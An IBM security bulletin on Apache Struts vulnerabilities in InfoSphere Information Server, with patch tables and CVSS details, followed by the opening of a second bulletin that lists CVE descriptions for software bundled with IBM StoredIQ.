**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages.
CVSS Base Score: 4.8
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/113853](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)

## Affected Products and Versions

The following products, running on all supported platforms, are affected:
IBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3, and 11.5
IBM InfoSphere Information Governance Catalog: versions 11.3 and 11.5
IBM InfoSphere Metadata Workbench: versions 8.5, 8.7, and 9.1

## Remediation/Fixes

| Product | VRMF | APAR | Remediation/First Fix |
|---|---|---|---|
| InfoSphere Information Server, Information Governance Catalog | 11.5 | JR56313 | Apply IBM InfoSphere Information Server version [11.5.0.1](<http://www-01.ibm.com/support/docview.wss?uid=swg24041893>), then apply the IBM InfoSphere Information Server Framework [Security Patch](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11501_isf_ru3_services_engine_client_multi>) and IBM InfoSphere Information Governance [Rollup patch 5](<http://www-01.ibm.com/support/docview.wss?uid=swg24042914>) |
| InfoSphere Information Server, Information Governance Catalog | 11.3 | JR56313 | Apply IBM InfoSphere Information Server version [11.3.1.2](<http://www-01.ibm.com/support/docview.wss?uid=swg24040138>), then apply the IBM InfoSphere Information Server Framework [Security Patch](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_isf_ru5_services_engine_client_multi>) and the IBM InfoSphere Information Governance Catalog [Security patch](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_IGC_ru23_server_client_multi>) |
| InfoSphere Information Server, Metadata Workbench | 9.1 | JR56313 | Apply IBM InfoSphere Information Server version [9.1.2.0](<http://www-01.ibm.com/support/docview.wss?uid=swg24035470>), then apply the IBM InfoSphere Information Server Framework [Security Patch](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is912_isf_ru11_services_engine_client_multi>) and the IBM InfoSphere Information Server Metadata Workbench [Security patch](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is912_JR56302_MWB_server_engine_client_multi>) |
| InfoSphere Information Server, Metadata Workbench | 8.7 | JR56313 | Apply IBM InfoSphere Information Server version [8.7 Fix Pack 2](<http://www-01.ibm.com/support/docview.wss?uid=swg24034359>), then apply the IBM InfoSphere Information Server Framework [Security Patch](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_isf_ru4_services_engine_client_multi>) and the IBM InfoSphere Information Server Metadata Workbench [Security patch](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_JR56302_MWB_server_engine_client_multi>) |

Note:
1. Some fixes require installing both a fix pack and a subsequent patch. The fix pack must be installed first; any additional patches required may be installed in any order.
2. For IBM InfoSphere Information Server version 8.5, IBM recommends upgrading to a fixed, supported version/release/platform of the product.

## Workarounds and Mitigations

None

## Get Notified about Future Security Bulletins

Subscribe to [My Notifications](<http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.

### References

[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide>)
[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator>)

[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide>)
[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0>)

## Related Information

[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>)
[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)

## Acknowledgement

None

## Change History

07 October 2016: Original version published
20 October 2016: Published fix for Metadata Workbench version 8.7
2 December 2016: For version 11.5, Governance Rollup 5 can be used instead of Governance Rollup 4 + IGC JR56313 patches

*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score.
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

## Disclaimer

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES "AS IS" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

## Internal Use Only

PSIRT 79202

Product metadata attached to the bulletin: IBM InfoSphere Information Server, versions 8.5, 8.7, 9.1, 11.3 and 11.5, on AIX, HP-UX, Linux, Solaris and Windows.

Database record for this bulletin: "Security Bulletin: Multiple Vulnerabilities in Struts affect IBM InfoSphere Information Server" (type ibm, bulletin family software), record published and last modified 2018-06-16T13:42:18, source https://www.ibm.com/support/pages/node/549551. The record carries a CVSS v3.0 score of 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and a CVSS v2 score of 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C), and lists CVE-2016-0785, CVE-2016-1181, CVE-2016-1182, CVE-2016-2162, CVE-2016-3081, CVE-2016-3082, CVE-2016-3087, CVE-2016-3093, CVE-2016-4003, CVE-2016-4430, CVE-2016-4431, CVE-2016-4433, CVE-2016-4436, CVE-2016-4438 and CVE-2016-4465.

Next bulletin in the record set (database entry last seen 2022-06-28T21:58:43):

## Summary

Multiple vulnerabilities in bundled software packages affect IBM StoredIQ.
IBM StoredIQ has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2009-0217](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0217>) \n**DESCRIPTION: **The design of the W3C XML Signature Syntax and Processing (XMLDsig) recommendation, as implemented in products including (1) the Oracle Security Developer Tools component in Oracle Application Server 10.1.2.3, 10.1.3.4, and 10.1.4.3IM; (2) the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6; (3) Mono before 2.4.2.2; (4) XML Security Library before 1.2.12; (5) IBM WebSphere Application Server Versions 6.0 through 6.0.2.33, 6.1 through 6.1.0.23, and 7.0 through 7.0.0.1; (6) Sun JDK and JRE Update 14 and earlier; (7) Microsoft .NET Framework 3.0 through 3.0 SP2, 3.5, and 4.0; and other products uses a parameter that defines an HMAC truncation length (HMACOutputLength) but does not require a minimum for this length, which allows attackers to spoof HMAC-based signatures and bypass authentication by specifying a truncation length with a small number of bits. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/51716](<https://exchange.xforce.ibmcloud.com/vulnerabilities/51716>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n \n**CVEID: **[CVE-2012-5783](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5783>) \n**DESCRIPTION: **Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. 
\nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/79984](<https://exchange.xforce.ibmcloud.com/vulnerabilities/79984>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n \n**CVEID: **[CVE-2012-2098](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2098>) \n**DESCRIPTION: **Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/75857](<https://exchange.xforce.ibmcloud.com/vulnerabilities/75857>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n \n**CVEID: **[CVE-2017-3589](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3589>) \n**DESCRIPTION: **Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 5.1.41 and earlier. Easily \"exploitable\" vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Connectors executes to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data. CVSS 3.0 Base Score 3.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N). \nCVSS Base score: 3.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/124962](<https://exchange.xforce.ibmcloud.com/vulnerabilities/124962>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n\n \n**CVEID: **[CVE-2017-3586](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3586>) \n**DESCRIPTION: **Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 5.1.41 and earlier. Easily \"exploitable\" vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Connectors. While the vulnerability is in MySQL Connectors, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data as well as unauthorized read access to a subset of MySQL Connectors accessible data. CVSS 3.0 Base Score 6.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N). \nCVSS Base score: 6.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/124960](<https://exchange.xforce.ibmcloud.com/vulnerabilities/124960>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) \n\n \n**CVEID: **[CVE-2017-3523](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3523>) \n**DESCRIPTION: **Vulnerability in the MySQL Connectors component of Oracle MySQL (subcomponent: Connector/J). Supported versions that are affected are 5.1.40 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Connectors. While the vulnerability is in MySQL Connectors, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.0 Base Score 8.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H). 
\nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/126183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/126183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2014-0114](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114>) \n**DESCRIPTION: **Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92889](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n \n**CVEID: **[CVE-2010-1632](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1632>) \n**DESCRIPTION: **Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/59588](<https://exchange.xforce.ibmcloud.com/vulnerabilities/59588>) for the current score. 
\nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:P) \n\n \n**CVEID: **[CVE-2009-2625](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2625>) \n**DESCRIPTION: **XMLScanner.java in Apache Xerces2 Java, asused in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/53082](<https://exchange.xforce.ibmcloud.com/vulnerabilities/53082>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n \n**CVEID: **[CVE-2013-4002](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002>) \n**DESCRIPTION: **XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause adenial of service via vectors related to XML attribute names. \nCVSS Base score: 7.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85260](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85260>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:C) \n\n \n**CVEID: **[CVE-2012-0881](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0881>) \n**DESCRIPTION: **Apache Xerces2 Java Parser before 2.12.0 allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/134404](<https://exchange.xforce.ibmcloud.com/vulnerabilities/134404>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n\n \n**CVEID: **[CVE-2015-6420](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6420>) \n**DESCRIPTION: **Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2017-15708](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15708>) \n**DESCRIPTION: **In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version. 
\nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136262](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136262>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2013-0248](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0248>) \n**DESCRIPTION: **The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack. \nCVSS Base score: 3.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/82618](<https://exchange.xforce.ibmcloud.com/vulnerabilities/82618>) for the current score. \nCVSS Vector: (AV:L/AC:M/Au:N/C:N/I:P/A:P) \n\n \n**CVEID: **[CVE-2016-1000031](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000031>) \n**DESCRIPTION: **Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/117957](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n \n**CVEID: **[CVE-2014-0050](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050>) \n**DESCRIPTION: **MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/90987](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90987>) for the current score. 
\nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n \n**CVEID: **[CVE-2018-20433](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20433>) \n**DESCRIPTION: **c3p0 0.9.5.2 allows XXE in extractXmlConfigFromInputStream in com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java during initialization. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/154680](<https://exchange.xforce.ibmcloud.com/vulnerabilities/154680>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N) \n\n \n**CVEID: **[CVE-2019-5427](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5427>) \n**DESCRIPTION: **c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/160025](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160025>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n\n \n**CVEID: **[CVE-2012-5055](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5055>) \n**DESCRIPTION: **DaoAuthenticationProvider in VMware SpringSource Spring Security before 2.0.8, 3.0.x before 3.0.8, and 3.1.x before 3.1.3 does not check the password if the user is not found, which makes the response delay shorter and might allow remote attackers to enumerate valid usernames via a series of login requests. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/80568](<https://exchange.xforce.ibmcloud.com/vulnerabilities/80568>) for the current score. 
\nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n\n \n**CVEID: **[CVE-2016-3093](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3093>) \n**DESCRIPTION: **Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n \n**CVEID: **[CVE-2016-5725](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5725>) \n**DESCRIPTION: **Directory traversal vulnerability in JCraft JSch before 0.1.54 on Windows, when the mode is ChannelSftp.OVERWRITE, allows remote SFTP servers to write to arbitrary files via a ..\\ (dot dot backslash) in a response to a recursive GET command. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/117122](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117122>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n\n \n**CVEID: **[CVE-2018-10237](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10237>) \n**DESCRIPTION: **Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray class (when serialized with Java serialization) and the CompoundOrdering class (when serialized with GWT serialization) perform eager allocation without appropriate checks on what a client has sent and whether the data size is reasonable. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/142508](<https://exchange.xforce.ibmcloud.com/vulnerabilities/142508>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n\n \n**CVEID: **[CVE-2012-5783](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5783>) \n**DESCRIPTION: **Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/79984](<https://exchange.xforce.ibmcloud.com/vulnerabilities/79984>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n \n**CVEID: **[CVE-2019-5427](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5427>) \n**DESCRIPTION: **c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/160025](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160025>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n\n \n**CVEID: **[CVE-2012-2098](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2098>) \n**DESCRIPTION: **Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs. 
\nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/75857](<https://exchange.xforce.ibmcloud.com/vulnerabilities/75857>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n \n**CVEID: **[CVE-2014-3578](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3578>) \n**DESCRIPTION: **Directory traversal vulnerability in Pivotal Spring Framework 3.x before 3.2.9 and 4.0 before 4.0.5 allows remote attackers to read arbitrary files via a crafted URL. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93774](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93774>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n\n \n**CVEID: **[CVE-2018-1272](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1272>) \n**DESCRIPTION: **Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, provide client-side support for multipart requests. When Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141286](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141286>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L) \n\n \n**CVEID: **[CVE-2014-3603](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3603>) \n**DESCRIPTION: **The (1) HttpResource and (2) FileBackedHttpResource implementations in Shibboleth Identity Provider (IdP) before 2.4.1 and OpenSAML Java 2.6.2 do not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/164271](<https://exchange.xforce.ibmcloud.com/vulnerabilities/164271>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n\n \n**CVEID: **[CVE-2015-1796](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1796>) \n**DESCRIPTION: **The PKIX trust engines in Shibboleth Identity Provider before 2.4.4 and OpenSAML Java (OpenSAML-J) before 2.6.5 trust candidate X.509 credentials when no trusted names are available for the entityID, which allows remote attackers to impersonate an entity via a certificate issued by a shibmd:KeyAuthority trust anchor. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105594](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105594>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n\n \n**CVEID: **[CVE-2017-5645](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5645>) \n**DESCRIPTION: **In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. 
